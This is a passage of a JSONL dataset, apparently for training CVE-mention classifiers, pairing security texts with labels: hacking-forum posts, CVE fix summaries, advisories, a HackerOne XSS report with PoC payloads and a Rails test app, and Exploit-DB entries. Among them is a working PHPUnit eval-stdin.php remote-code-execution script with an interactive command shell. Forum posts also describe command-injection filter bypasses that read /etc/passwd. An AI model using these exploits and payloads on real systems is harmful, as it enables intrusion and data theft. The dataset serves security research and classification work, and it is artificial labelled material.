type in 737 and it was correct. Does anybody know why there was one more package listed?", "source": "hackthebox", "timestamp": "2022-02-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "577bdf6b5f689910afb3", "text": "[Cross-site Scripting (XSS) - Generic] CVE-2022-23519: Rails::Html::SafeListSanitizer vulnerable to XSS when certain tags are allowed (math+style || svg+style)\n\nThe following is from: https://hackerone.com/reports/1656627\n\n## Intro\n\nThe Rails HTML sanitzier allows to set certain combinations of tags in it's allow list that are not properly handled. \nSimilar to the report [1530898](https://hackerone.com/reports/1530898), which identified the combination`select` and `style` as vulnerable,\nmy fuzz testing from today suggests that also `svg` and `style` as well as `math` and `style` allow XSS.\nThe following are PoCs for each of these allow list:\n- `svg` and `style`: ``\n- `math` and `style`: ``\n\nSee the following IRB session: \n```\nirb(main):016:0> require 'rails-html-sanitizer'\n=> false\nirb(main):017:0> Rails::Html::SafeListSanitizer.new.sanitize(\"\", tags: [\"svg\", \"style\"]).to_s\n=> \"\"\nirb(main):018:0> Rails::Html::SafeListSanitizer.new.sanitize(\"\", tags: [\"math\", \"style\"]).to_s\n=> \"\"\nirb(main):019:0> puts Rails::Html::Sanitizer::VERSION\n1.4.3\n=> nil \n```\n\n## Sample Vulnerable Rails Application\n\nTo build a sample rails application that is vulnerable, I've used the following `Dockerfile`:\n\n```\nFROM ruby:3.1.2\n\nRUN apt-get update && apt-get install -y vim\n\nWORKDIR /usr/src/app\nRUN gem install rails && rails new myapp\nWORKDIR /usr/src/app/myapp\n\n\nCOPY build-rails-app.sh ./build-rails-app.sh\nRUN sh ./build-rails-app.sh\nRUN RAILS_ENV=production rails assets:precompile\n\nCMD [\"./bin/rails\", \"server\", \"-b\", \"0.0.0.0\", \"-e\", \"production\"]\n```\n\nIn the same directory, put a shell script `build-rails-app.sh` which writes the app:\n\n```\n#!/ibn/sh\n\n# make routes\ncat << EOF > ./config/routes.rb\nRails.application.routes.draw do\n get \"/poc1\", to: \"poc1#index\"\n get \"/poc2\", to: \"poc2#index\"\nend\nEOF\n\n# make Poc1 endpoint\n# http://localhost:8888/poc1?name=%3Csvg%3E%3Cstyle%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/style%3E%3Csvg%3E\nbin/rails generate controller Poc1 index --skip-routes\n\ncat << EOF > ./app/controllers/poc1_controller.rb\nclass Poc1Controller < ApplicationController\n def index\n @name = params[:name] || \"put your name here\"\n end\nend\nEOF\n\n\ncat << EOF > ./app/views/poc1/index.html.erb\n

    Hello <%= sanitize @name, tags: [\"svg\", \"style\"] %>

    \n
    \nPoC with a sanitized, reflected parameter 'name' for which 'svg' annd 'style' tags are allowed.\n
    \n<%= link_to \"Go to PoC\", \"/poc1?name=\" %>\n
    \n
    \nUsing: rails-html-sanitizer <%= Rails::Html::Sanitizer::VERSION %>\nEOF\n\n\n# make Poc2 endpoint\n# http://localhost:8888/poc2?name=%3Cmath%3E%3Cstyle%3E%3Cimg%20src=x%20onerror=alert(1)%3E%3C/style%3E%3Cmath%3E\nbin/rails generate controller Poc2 index --skip-routes\n\ncat << EOF > ./app/controllers/poc2_controller.rb\nclass Poc2Controller < ApplicationController\n def index\n @name = params[:name] || \"put your name here\"\n end\nend\nEOF\n\n\ncat << EOF > ./app/views/poc2/index.html.erb\n

    Hello <%= sanitize @name, tags: [\"math\", \"style\"] %>

    \n
    \nPoC with a sanitized, reflected parameter 'name' for which 'math' annd 'style' tags are allowed.\n
    \n<%= link_to \"Go to PoC\", \"/poc2?name=\" %>\n
    \n
    \nUsing: rails-html-sanitizer <%= Rails::Html::Sanitizer::VERSION %>\nEOF\n```\n\nWith the following `Makefile` you can build and run the application\n\n```\n.PHONY: build\nbuild:\n\tdocker build -t local/railspoc:latest .\n\n.PHONY: run\nrun:\n\tdocker run -it --rm -p 127.0.0.1:8888:3000 local/railspoc:latest\n```\n\nNow you have a Rails application with two routes `/poc1` and `/poc2` running locally. Visit:\n- [http://localhost:8888/poc1?name=%3Csvg%3E%3Cstyle%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/style%3E%3Csvg%3E](http://localhost:8888/poc1?n", "source": "hackerone", "timestamp": "2023-01-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "19948d4ac4e1ea2dd50e", "text": "In actual, I didn’t have to use SharpHound.ps1. The key to solution is acls.csv . This file is one of the files regarding AD and it contains informations about target AD.", "source": "hackthebox", "timestamp": "2023-01-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "688525dd1781fa9ca8db", "text": "CVE: CVE-2022-0235\n\n[{'lang': 'en', 'value': 'node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor'}]\n\nFix commit: 3.1.1 release (#1451)", "source": "cvefixes", "timestamp": "2022-01-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "607951e3caa412aea42e", "text": "I got to the point where I can read and need to pwn leak . I can call handler and get Bye back. I also understand that there are not enough rop gadgets to call system. I tried ret2csu , but as I understand there are also not enough gadgets for this. I’m trying to ret2dl , w/ pwntools. But it says that it can’t find any instructions for syscall. Given the progression of the challenge, it feels like I’m chasing a rabbithole and it should be simpler than that. Can anyone give a hint?", "source": "hackthebox", "timestamp": "2023-07-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a23415014703800b4b03", "text": "Farial_Mahmod: Rafel Rat : Android Rat Written In Java!Kalilinuxtutorials I tried three of them actually I am in testing Fatrat which is litllebit long not updated. Ahmyth are good but have weak options and not all working. [Rafel Rat] It’s buggy, as well many otpions does now work. I found this one https://www.youtube.com/watch?v=OxzJfi8WOcU (EDIT YES it’s scam, don’t buy) Which have options like copy code from google auth but I think seller could be a scammer as I see his group on telegream has mark SCAM next to his name.", "source": "parrotsec", "timestamp": "2022-01-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "97c3eac62d690d37c51a", "text": "I finished this module today. It was brutal. It was very confusing, and I thank you all for helping me in one way or another. The comments by @akorexsecurity specifically enabled me to finish this module. John", "source": "hackthebox", "timestamp": "2022-12-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1fc493d420d577ab7b80", "text": "CVE: CVE-2022-21711\n\n[{'lang': 'en', 'value': 'elfspirit is an ELF static analysis and injection framework that parses, manipulates, and camouflages ELF files. When analyzing the ELF file format in versions prior to 1.1, there is an out-of-bounds read bug, which can lead to application crashes or information leakage. By constructing a special format ELF file, the information of any address can be leaked. elfspirit version 1.1 contains a patch for this issue.'}]\n\nFix commit: Fix #1 about out-of-bounds", "source": "cvefixes", "timestamp": "2022-01-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ff017988cd7e88bd510b", "text": "CVE: CVE-2022-37451\n\n[{'lang': 'en', 'value': 'Exim before 4.96 has an invalid free in pam_converse in auths/call_pam.c because store_free is not used after store_malloc.'}]\n\nFix commit: Fix PAM auth. Bug 2813", "source": "cvefixes", "timestamp": "2022-08-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "00e206cd69d5444a4363", "text": "Cross-site Scripting in Jenkins REST List Parameter Plugin\n\n[Severity: HIGH]\n\nJenkins REST List Parameter Plugin 1.5.2 and earlier does not escape the name and description of REST list parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.\n\nExploitation of this vulnerability requires that parameters are listed on another page, like the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages provided by Jenkins (core), and that those pages are not hardened to prevent exploitation. Jenkins (core) has prevented exploitation of vulnerabilities of this kind on the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages since 2.44 and LTS 2.32.2 as part of the [SECURITY-353 / CVE-2017-2601](https://www.jenkins.io/security/advisory/2017-02-01/#persisted-cross-site-scripting-vulnerability-in-parameter-names-and-descriptions) fix. Additionally, several plugins have previously been updated to list parameters in a way that prevents exploitation by default, see [SECURITY-2617 in the 2022-04-12 security advisory for a list](https://www.jenkins.io/security/advisory/2022-04-12/#SECURITY-2617).", "source": "github_advisory", "timestamp": "2022-06-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "447bde114c7372d94d79", "text": "Any hints for flag4? Pulling my hair out with it at the moment and getting nowhere No matter…I have it…I was focusing too much on the one thing", "source": "hackthebox", "timestamp": "2022-01-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "28cc7ec5a487096839b7", "text": "Improper Authentication in Apache Axis2\n\n[Severity: MEDIUM]\n\nApache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a \"Signature exclusion attack,\" a different vulnerability than CVE-2012-4418. ", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c9be0555cada9f21c622", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8353, CVE-2018-8355, CVE-2018-8359, CVE-2018-8371, CVE-2018-8372, CVE-2018-8373, CVE-2018-8385, CVE-2018-8389.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "72910330f706ab458582", "text": "CVE: CVE-2021-30070\n\n[{'lang': 'en', 'value': \"An issue was discovered in HestiaCP before v1.3.5. Attackers are able to arbitrarily install packages due to values taken from the pgk [] parameter in the update request being transmitted to the operating system's package manager.\"}]\n\nFix commit: Prevent install via CLI / API / WebGUI via command v-update-sys-hestia package \nCurrent script accepts all valid packages now limiited to hestia, hestia-nginx, hestia-php\n@numanturle", "source": "cvefixes", "timestamp": "2022-08-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0a795b05f27ef7364619", "text": "Can you possibly help me too? I’ve been battling with this for days. So far I’ve discovered that all the operands except && are blocked (ie. ; | \\n) A sub shell is possible and ${PATH:0:1} works for /. However, LS_COLORS doesn’t exist so I can’t get a ; from that. I’ve tried 877915113.txt$(tr${IFS}‘!-}’${IFS}‘\"-~’<<<:) to try and get a ; - I don’t get a Malicious error, I just get “Error While Moving:” and no filename or anything further. Right now I’m just trying to execute the ls command, but I’m getting nowhere. I feel like there is something simple I’m missing?", "source": "hackthebox", "timestamp": "2022-11-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f8f39f15357e9878de24", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ced7b7a6a92fd5d0c654", "text": "CVE: CVE-2021-40565\n\n[{'lang': 'en', 'value': 'A Segmentation fault caused by a null pointer dereference vulnerability exists in Gpac through 1.0.1 via the gf_avc_parse_nalu function in av_parsers.c when using mp4box, which causes a denial of service.'}]\n\nFix commit: fixed #1902", "source": "cvefixes", "timestamp": "2022-01-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1e65f6f482189b40883d", "text": "CVE: CVE-2022-29369\n\n[{'lang': 'en', 'value': 'Nginx NJS v0.7.2 was discovered to contain a segmentation violation via njs_lvlhsh_bucket_find at njs_lvlhsh.c.'}]\n\nFix commit: Fixed njs_vmcode_interpreter() when \"toString\" conversion fails.\n\nPreviously, while interpreting a user function, njs_vmcode_interpreter()\nmight return prematurely when an error happens. This is not correct\nbecause the current frame has to be unwound (or exception caught)\nfirst.\n\nThe fix is exit through only 5 appropriate exit points to ensure\nproper unwinding.\n\nThis closes #467 issue on Github.", "source": "cvefixes", "timestamp": "2022-05-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a52066f5cf3a60599372", "text": "Which kernel version is installed on the system? (Format: 1.22.3) Which kernel version is installed on the system? (Format: 1.22.3) I nedd help", "source": "hackthebox", "timestamp": "2022-11-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "738113ba1df2590d6a56", "text": "I`ve been stuck at this one for a while, I get many numbers but none are right…", "source": "hackthebox", "timestamp": "2023-02-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "739e63b2dd868fac5181", "text": "Throwing my tips here since I found a cheeky way of doing this flag using mostly what you get in lesson “Bypassing Other Blacklisted Characters”. Here’s the deal, the default move command is like mv src dest … Now, HTB’s hint says it’s easier to inject at the end rather than the middle. Actually if you do both you get a quick and easy way… Start like this: try to move the flag to /tmp , it won’t work but you will get a valuable error message. Now what would happen if you would run a command like: mv source /var/www/html/tmp$(head -n 1 /etc/passwd) ? You’d get the first line of /etc/passwd in the path itself. Try to adapt this to the assessment, it doesn’t require anything advanced, no base64 encoding or reversing… all you need to use is PATH, IFS and bypass a blacklisted command", "source": "hackthebox", "timestamp": "2023-11-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "af07abe0f5a4f86f3c0a", "text": "Has there been anyone able to solve that very last question and sucessfully finish that module?", "source": "hackthebox", "timestamp": "2022-02-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8a7f9ddb51d833d60ade", "text": "CVE: CVE-2022-29211\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.histogram_fixed_width` is vulnerable to a crash when the values array contain `Not a Number` (`NaN`) elements. The implementation assumes that all floating point operations are defined and then converts a floating point result to an integer index. If `values` contains `NaN` then the result of the division is still `NaN` and the cast to `int32` would result in a crash. This only occurs on the CPU implementation. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Prevent crash when histogram is called with NaN values.\n\nFixes #45770\n\nPiperOrigin-RevId: 443149951", "source": "cvefixes", "timestamp": "2022-05-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2b5f5bbc1559a29e1b95", "text": "CVE: CVE-2022-2301\n\n[{'lang': 'en', 'value': 'Buffer Over-read in GitHub repository hpjansson/chafa prior to 1.10.3.'}]\n\nFix commit: XwdLoader: Fix buffer over-read and improve general robustness\n\nThis commit fixes a buffer over-read that could occur due to g_ntohl()\nevaluating its argument more than once if at least one of the following\nis true:\n\n* Build target is not x86.\n* __OPTIMIZE__ is not set during compilation (e.g. -O0 was used).\n\nIt also improves robustness more generally and fixes an issue where the\nwrong field was being used to calculate the color map size, causing some\nimage files that were otherwise fine to be rejected.\n\nReported by @JieyongMa via huntr.dev.", "source": "cvefixes", "timestamp": "2022-07-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "00f77776d274d6f80835", "text": "PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)\n\n# Exploit Title: PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)\n# Date: 2022/01/30\n# Exploit Author: souzo\n# Vendor Homepage: phpunit.de\n# Version: 4.8.28\n# Tested on: Unit\n# CVE : CVE-2017-9841\n\nimport requests\nfrom sys import argv\nphpfiles = [\"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\", \"/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\", \"/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\", \"/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\", \"/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\", \"/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\"]\n\ndef check_vuln(site):\n vuln = False\n try:\n for i in phpfiles:\n site = site+i\n req = requests.get(site,headers= {\n \"Content-Type\" : \"text/html\",\n \"User-Agent\" : f\"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0\",\n },data=\"\")\n if \"6dd70f16549456495373a337e6708865\" in req.text:\n print(f\"Vulnerable: {site}\")\n return site\n except:\n return vuln\ndef help():\n exit(f\"{argv[0]} \")\n\ndef main():\n if len(argv) < 2:\n help()\n if not \"http\" in argv[1] or not \":\" in argv[1] or not \"/\" in argv[1]:\n help()\n site = argv[1]\n if site.endswith(\"/\"):\n site = list(site)\n site[len(site) -1 ] = ''\n site = ''.join(site)\n\n pathvuln = check_vuln(site)\n if pathvuln == False:\n exit(\"Not vuln\")\n try:\n while True:\n cmd = input(\"> \")\n req = requests.get(str(pathvuln),headers={\n \"User-Agent\" : f\"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0\",\n \"Content-Type\" : \"text/html\"\n },data=f'')\n print(req.text)\n except Exception as ex:\n exit(\"Error: \" + str(ex))\nmain()", "source": "exploitdb", "timestamp": "2022-02-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9e7d10b7707844e8c7ad", "text": "Node Connect Reflected Cross-Site Scripting in Sencha Labs Connect middleware\n\n[Severity: MEDIUM]\n\nnode-connect before 2.8.2 has cross site scripting in Sencha Labs Connect middleware (vulnerability due to incomplete fix for CVE-2013-7370)\n\n### Overview\nConnect is a stack of middleware that is executed in order in each request.\n\nThe \"methodOverride\" middleware allows the http post to override the method of the request with the value of the \"_method\" post key or with the header \"x-http-method-override\".\n\nBecause the user post input was not checked, req.method could contain any kind of value. Because the req.method did not match any common method VERB, connect answered with a 404 page containing the \"Cannot `[method]` `[url]`\" content. The method was not properly encoded for output in the browser.\n\n\n### Example:\n```\n~ curl \"localhost:3000\" -d \"_method=\"\nCannot /\n```\n\n### Recommendation\n\nUpdate to the newest version of Connect or disable methodOverride. It is not possible to avoid the vulnerability if you have enabled this middleware in the top of your stack.\n\n### Credit:\nSergio Arcos", "source": "github_advisory", "timestamp": "2022-05-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2dd25f8c36959c136669", "text": "Introduction to Windows Command Line - Skill Assessment nº9\n\nHi! I cannot pass question nº9 Use the tasklist command to print the started services and then sort them in reverse order by name. The fourth service is the flag for this user. I have tried the following with no luck: Get-Service | Sort-Object -Property Name -Descending Get-Service | Where status -like ‘Running’ | Sort-Object -Property Name -Descending Any tip?", "source": "hackthebox", "timestamp": "2022-12-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9c1b477e129ad6d8c759", "text": "Off-topic: image 592×198 34.7 KB The actual result image 592×128 14.5 KB", "source": "parrotsec", "timestamp": "2022-03-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8ca0cb336dcde83260ea", "text": "CVE: CVE-2022-26530\n\n[{'lang': 'en', 'value': 'swaylock before 1.6 allows attackers to trigger a crash and achieve unlocked access to a Wayland compositor.'}]\n\nFix commit: Add support for ext-session-lock-v1\n\nThis is a new protocol to lock the session [1]. It should be more\nreliable than layer-shell + input-inhibitor.\n\n[1]: https://gitlab.freedesktop.org/wayland/wayland-protocols/-/merge_requests/131", "source": "cvefixes", "timestamp": "2022-04-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ae005e22cde85d21798e", "text": "Th3Director: Try sudo dnstool address 1.1.1.1 or 8.8.8.8 Or check the settings in your browser, mostly about proxy. Proxy settings are good, plugins off, still most website even does not open if I click in bookmark there is no any action after click.", "source": "parrotsec", "timestamp": "2022-02-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "fdded81e98f09557c69e", "text": "image 1267×843 227 KB having similar issue, its taking longer than the time laps given for the ip and port needing help for mking the passlist", "source": "hackthebox", "timestamp": "2023-04-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "168ad749e6419a88a45c", "text": "CVE: CVE-2022-24300\n\n[{'lang': 'en', 'value': 'Minetest before 5.4.0 allows attackers to add or modify arbitrary meta fields of the same item stack as saved user input, aka ItemStack meta injection.'}]\n\nFix commit: Sanitize ItemStack meta text", "source": "cvefixes", "timestamp": "2022-02-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "46043195e0d56ad69d32", "text": "Three walkthrough\n\nI followed the three writeup and still can’t reverse shell to capture flag. YT tutors didn’t help. What’s wrong with this one?", "source": "hackthebox", "timestamp": "2023-05-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2a23a7d359f98afe6779", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nThe Chakra JavaScript engine in Microsoft Edge allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"Scripting Engine Memory Corruption Vulnerability,\" a different vulnerability than CVE-2016-0186 and CVE-2016-0191.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "247a2e352f1bbf4f2b7e", "text": "CVE: CVE-2022-0339\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in Pypi calibreweb prior to 0.6.16.'}]\n\nFix commit: Kobo sync token is now also created if accessed from localhost(fixes #1990)\nCreate kobo sync token button is now \"unclicked\" after closing dialog\nAdditional localhost route is catched\nIf book format is deleted this also deletes the book synced to kobo status", "source": "cvefixes", "timestamp": "2022-01-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c34132dc457314735a25", "text": "MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTSchedulerService_\n\n# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path\n# Date: 06/07/2023\n# Exploit Author: Idan Malihi\n# Vendor Homepage: https://www.minitool.com/\n# Software Link: https://www.minitool.com/download-center/\n# Version: 12.7\n# Tested on: Microsoft Windows 10 Pro\n# CVE : CVE-2023-36165\n\n#PoC\n\nC:\\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v \"\"\"\nMTSchedulerService MTSchedulerService C:\\Program Files (x86)\\MiniTool ShadowMaker\\SchedulerService.exe Auto\n\nC:\\Users>sc qc MTSchedulerService\n[SC] QueryServiceConfig SUCCESS\n\nSERVICE_NAME: MTSchedulerService\n TYPE : 110 WIN32_OWN_PROCESS (interactive)\n START_TYPE : 2 AUTO_START\n ERROR_CONTROL : 1 NORMAL\n BINARY_PATH_NAME : C:\\Program Files (x86)\\MiniTool ShadowMaker\\SchedulerService.exe\n LOAD_ORDER_GROUP :\n TAG : 0\n DISPLAY_NAME : MTSchedulerService\n DEPENDENCIES :\n SERVICE_START_NAME : LocalSystem\n\nC:\\Users>systeminfo\n\nHost Name: DESKTOP-LA7J17P\nOS Name: Microsoft Windows 10 Pro\nOS Version: 10.0.19042 N/A Build 19042\nOS Manufacturer: Microsoft Corporation", "source": "exploitdb", "timestamp": "2023-07-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "33878590874e674e0abb", "text": "Hasp hl emulation troubles\n\nHi, i have a hasp hl i have been trying to emulate. i have all emulation files needed drivers installed ect however when i try and dump i am recieving hasp not key found. (Photo attached) Cannot get my head around it really as i have all drivers ect the hasp is showing on the computer. I have attached a photo any help would be much appreciated Thankyou", "source": "go4expert", "timestamp": "2022-03-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "25f4cc4fb2b26fb09bbb", "text": "CVE: CVE-2022-29189\n\n[{'lang': 'en', 'value': 'Pion DTLS is a Go implementation of Datagram Transport Layer Security. Prior to version 2.1.4, a buffer that was used for inbound network traffic had no upper limit. Pion DTLS would buffer all network traffic from the remote user until the handshake completes or timed out. An attacker could exploit this to cause excessive memory usage. Version 2.1.4 contains a patch for this issue. There are currently no known workarounds available.'}]\n\nFix commit: Add limit to fragmentBuffer\n\nBefore we imposed no limit on the amount of data we would buffer during\nthe handshake. This changes adds a 2 megabyte. When the limit is\nexceeded the Conn returns an error.", "source": "cvefixes", "timestamp": "2022-05-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b766e80320c142e77d30", "text": "Incorrect flag\n\nI have got user and root flag for one of the active machine but when i paste into submit flag field it shows me Error-incorrect flag. I have also watched videos on how to other people sumit the flag and i am replicating the same steps with the my flags still it gives me error. Can somebody help me on this?", "source": "hackthebox", "timestamp": "2023-03-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "722df1502c432145c39b", "text": "cherryeater: I will happy to help you without spoilering if you still needed. Can you give any more hints?", "source": "hackthebox", "timestamp": "2022-01-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "766d2a96af42037495ca", "text": "Talos vulnerable dependency due to race condition in Linux kernel's IP framework XFRM\n\n[Severity: HIGH]\n\n### Impact\nA race condition was found in the Linux kernel's IP framework for transforming packets (XFRM subsystem) when multiple calls to xfrm_probe_algs occurred simultaneously. This flaw could allow a local attacker to potentially trigger an out-of-bounds write or leak kernel heap memory by performing an out-of-bounds read and copying it into a socket.\n\n### Patches\nThe fix has been backported to [5.15.64](https://www.linuxkernelcves.com/cves/CVE-2022-3028) version of the upstream Linux kernel (5.15 is the upstream Kernel long term version Talos ships with). Talos >= v1.2.0 is shipped with Linux Kernel 5.15.64 fixing the above issue.\n\nKubernetes workloads running in Talos are not affected since user namespaces are disabled in Talos kernel config. So an unprivileged user cannot obtain CAP_NET_ADMIN by unsharing. However untrusted workloads that run with privileged: true or having NET_ADMIN capability poses a risk.\n\n### Workarounds\nAudit kubernetes workloads running in the cluster with privileged: true set or having NET_ADMIN capability and assess the threat vector.\n\n### References\n- https://nvd.nist.gov/vuln/detail/CVE-2022-3028\n- https://access.redhat.com/security/cve/CVE-2022-3028\n\n### For more information\n- Email us at [security@siderolabs.com](mailto:security@siderolabs.com)\n", "source": "github_advisory", "timestamp": "2022-09-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "acfebc3d2c33452831a3", "text": "Server-Side Request Forgery in calibreweb\n\n[Severity: CRITICAL]\n\ncalibreweb prior to version 0.6.17 is vulnerable to server-side request forgery (SSRF). This is due to an incomplete fix for [CVE-2022-0339](https://github.com/advisories/GHSA-4w8p-x6g8-fv64). The blacklist does not check for `0.0.0.0`, which would result in a payload of `0.0.0.0` resolving to `localhost`.", "source": "github_advisory", "timestamp": "2022-03-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a8b4c83eea3dd7259b1c", "text": "May I suggest the following: I think the exercise with the nomachine setup could be greatly simplified by simply providing the pcap file. the setup with nomachine is really cumbersome, I get timeouts every couple of minutes and reconnecting takes another couple of minutes. Like this it is just a pain.", "source": "hackthebox", "timestamp": "2022-03-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7d82a1bdd00db2a98c0f", "text": "Both Cybersecurity and Artificial Intelligence/Machine Learning are exciting fields with a lot of potential for the future. It really depends on your interests and career goals. If you’re interested in protecting computer systems and networks from cyber attacks, Cybersecurity and digital forensic might be a good fit for you. On the other hand, if you’re interested in developing cutting-edge technology and working on projects like self-driving cars or virtual assistans. AI and machine learning might be a better option.", "source": "hackersploit", "timestamp": "2023-06-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "53bc357e1d69a66c4a16", "text": "ChakraCore Remote code execution Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8583, CVE-2018-8617, CVE-2018-8618, CVE-2018-8629.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2f5b77a8f6e5f0c7dbf9", "text": "CVE: CVE-2022-1441\n\n[{'lang': 'en', 'value': 'MP4Box is a component of GPAC-2.0.0, which is a widely-used third-party package on RPM Fusion. When MP4Box tries to parse a MP4 file, it calls the function `diST_box_read()` to read from video. In this function, it allocates a buffer `str` with fixed length. However, content read from `bs` is controllable by user, so is the length, which causes a buffer overflow.'}]\n\nFix commit: fixed #2175", "source": "cvefixes", "timestamp": "2022-04-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "42a5c2d9417352f9cb42", "text": "wow! great. i would like to learn more about how you are controlling the drone via keyboard. its been almost 2 years i’ve stoped working on this.", "source": "hackthebox", "timestamp": "2023-11-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2932605f2c069711d73d", "text": "CVE: CVE-2022-24953\n\n[{'lang': 'en', 'value': 'The Crypt_GPG extension before 1.6.7 for PHP does not prevent additional options in GPG calls, which presents a risk for certain environments and GPG versions.'}]\n\nFix commit: Insert the end-of-options marker before operation arguments.\n\nThis marker stops the parsing of additional options during external\ncalls to GPG. This behavior is unintended but its security impact is\ndependent on the environment and the GPG version in use.", "source": "cvefixes", "timestamp": "2022-02-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "092874f0bcdf69f7cf3a", "text": "Wow this was difficult. I finally got the flag. It was a lot more simple than I thought. I heard others get the flag with different methods but my method was relatively simple. 